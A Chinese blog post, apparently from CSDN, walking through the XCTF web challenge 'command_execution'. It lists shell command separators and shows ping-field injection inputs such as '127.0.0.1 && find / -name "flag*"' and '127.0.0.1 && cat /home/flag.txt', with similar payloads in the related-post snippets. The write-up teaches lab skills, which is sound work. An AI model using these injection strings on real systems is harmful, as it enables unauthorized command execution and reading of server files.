攻防世界 web——command_execution

已于 2023-11-15 23:24:19 修改
阅读量128 收藏 1
点赞数
分类专栏: CTF 文章标签: web安全 网络安全
于 2023-09-03 16:54:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XYZCG/article/details/132651816
版权

没有waf,即web应用可能会执行输入的恶意代码,进而造成命令执行漏洞

输入127.0.0.1,得到

这里先学习一下常见的连接符:

;A;B先执行A,再执行B
&A&B简单拼接,A B之间无制约关系
|A|B显示B的执行结果
&&A&&BA执行成功,然后才会执行B
||A||BA执行失败,然后才会执行B

 这里我们尝试

127.0.0.1 && find / -name "flag*"  

#   /     根目录开始找        -name "flag*"    查找含有flag的文件名           *   通配符

找到了flag.txt的路径,接下来输入cat查看

127.0.0.1 && cat /home/flag.txt       #cat是查看命令

An1a_M
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界command_executionweb简单)
my_name_is_sy的博客
05-31 316
在一个没有写waf的地方给shell命令的执行权限是真的危险啊。 这个题主要考点为shell命令的拼接。 文章中包含了几种常见的shell命令拼接方法。
Hardware_Accelerated_Execution_Manager.zip
06-09
用以解决androidatudio虚拟机因未装haxm而无法运行的情况: 将intelhaxm-android文件放入..sdk\extras\intel\Hardware_Accelerated_Execution_Manager文件下,然后手动运行intelhaxm-android文件。
攻防世界-command_execution
qq_74276395的博客
03-11 91
攻防世界-command_execution
攻防世界-web-command_execution
最新发布
MateSnake的博客
05-11 193
攻防世界-web-command_execution
攻防世界command_execution
人若无名,便可专心练剑
03-15 229
command_execution
VAL2.rar_Symbolic execution_execution
09-14
《深入理解Symbolic ExecutionExecution在Java环境中的应用——基于Symstra框架的C代码解析》 在计算机科学领域,符号执行(Symbolic Execution)是一种强大的软件分析技术,它能够帮助我们理解和验证程序的行为...
BPEL.rar_BPEL_BPEL4ws_execution_web服务
09-19
这种表示方法被称为 Web 服务的业务流程执行语言(Business Process Execution Language for Web Services)(以下简称为 BPEL4WS)。用 BPEL4WS 表示的流程只能通过使用 Web 服务接口来导出和导入功能。
php max_execution_time执行时间问题
10-28
$original_max_execution_time = ini_get('max_execution_time'); ini_set('max_execution_time', 0); // 设置为无限制 // 长时间运行的代码... ini_set('max_execution_time', $original_max_execution_time)...
eager_execution_execution_eagerexecution_tensorflow_
10-04
在TensorFlow库中,Eager Execution是一种立即执行的模式,与传统的图模式(Graph Mode)形成对比。在Eager Execution模式下,TensorFlow的操作会立即评估并返回结果,无需构建计算图并单独运行它。这使得开发过程...
攻防世界 command_execution
lzu_lfl的博客
09-07 196
攻防世界 command_execution_WP
攻防世界command_execution
qq_60905276的博客
11-09 5360
1.攻防世界command_execution 首先掌握命令执行漏洞(Command Execution)的知识。 命令执行漏洞即使用者可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。其造成的原因是Web服务器对用户输入命令安全检测不足(比如没加waf),导致恶意代码被执行。 ping用于确定本地主机是否能与另一台主机成功交换(发送与接收)数据包,再根据返回的信息,就可以推断TCP/IP参数是否设置正确,以及运行是否正常、网络是否通畅等 如题就是没写waf,用户输入
攻防世界command_execution
一期一会的博客
01-15 232
看题目,又是一个命令执行。这里不进行过多总结,详情请看 命令执行总结 靶场演练 我们尝试使用&&(&&表示当左边的命令执行为真时,才会去执行右边的命令)去执行命令,ls发现我们输入的是有效的。 紧接着find一下以.txt结尾的文件 127.0.0.1&&find / -name "*.txt" 找到了,直接cat查看 ...
command_execution(攻防世界
m0_70819573的博客
02-22 197
command1 && command2 先执行 command1,如果为真,再执行 command2。command1 || command2 先执行 command1,如果为假,再执行 command2。command1 & command2 先执行 command2 后执行 command1。command1 | command2 只执行 command2。2.可以利用字符串拼接,需要掌握有关命令执行的知识。命令执行漏洞(| || & && 称为 管道符)
攻防世界-WEBcommand_execution
wlw1275178332的博客
03-16 204
command1 && command2 先执行 command1,如果为真,再执行 command2。command1 || command2 先执行 command1,如果为假,再执行 command2。题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。command1 & command2 先执行 command2 后执行 command1。根据题目描述,我们可以推测应该是在ping命令拼接了其他命令导致文件信息的泄露。发现txt文件,直接用cat查看。
BUUCTF之Exec,攻防世界command_execution
金 帛的博客
03-16 2093
BUUCTFWP
攻防世界 web command_execution 【命令执行】
Hrain7的博客
11-14 524
看到ping 就想到了命令执行 ,“请输入需要的ping地址”,就输入本机地址 127.0.0.1 然后输入 ls命令:127.0.0.1 && ls 找出当前目录 发现可以找到当前目录 然后再找.txt 后缀的文件,输入 127.0.0.1 && find -name ".txt" 找到了flag.txt ,接下来就是访问 flag.txt 输入 127.0.0.1 && cat /home/flag.tx...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值